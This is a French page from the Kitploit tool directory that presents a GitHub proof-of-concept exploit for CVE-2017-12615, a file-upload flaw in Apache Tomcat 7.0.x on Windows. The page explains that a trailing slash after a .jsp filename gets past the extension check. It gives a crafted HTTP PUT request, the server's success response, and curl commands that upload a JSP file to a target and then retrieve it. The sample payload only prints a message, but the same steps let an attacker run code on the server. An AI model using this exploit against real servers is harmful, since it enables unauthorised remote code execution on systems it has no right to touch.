Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/breaktoprotect/cve-2017-12615
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

Exploit POC pour la vulnérabilité PUT JSP Apache Tomcat 7.0.x CVE-2017-12615.

Voir le dépôt
11221il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

À la mémoire de Chia Junyuan (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

Exploit POC pour Apache Tomcat 7.0.0 à 7.0.79 fonctionnant sous Windows ; vulnérabilité PUT JSP CVE-2017-12615.

Description :

Par conception, il n'est pas autorisé de télécharger des fichiers JSP via la méthode PUT sur les serveurs Apache Tomcat. Ceci est probablement une mesure de sécurité pour empêcher un attaquant de télécharger un shell JSP et d'obtenir une exécution de code à distance sur le serveur. Cependant, en raison de contrôles insuffisants, un attaquant peut obtenir une exécution de code à distance sur les serveurs Tomcat 7.0.{0 à 79} qui ont activé PUT en demandant la méthode PUT sur le serveur Tomcat à l'aide d'une requête HTTP spécialement conçue. Mais sérieusement, spécial ? S'il vous plaît.

Méthode d'exploitation :

En ajoutant un caractère '/' derrière l'extension du nom de fichier, on peut contourner la vérification de l'extension de fichier. C'est tout. Donc, pas si spécial en fait.

Exploit via une méthode de requête :

Requête

root@kitploit:~
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

Réponse attendue en cas de succès

root@kitploit:~
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

Exploit avec 'curl' :

  1. Créez un fichier .jsp (par exemple test.jsp) :
root@kitploit:~
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. Exécutez la commande curl sur le serveur cible :
root@kitploit:~
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. Vérifiez si votre fichier a été téléchargé en accédant à l'adresse cible ou en utilisant :
root@kitploit:~
curl http://target-host-or-ip-address:port/test.jsp
Télécharger l’outil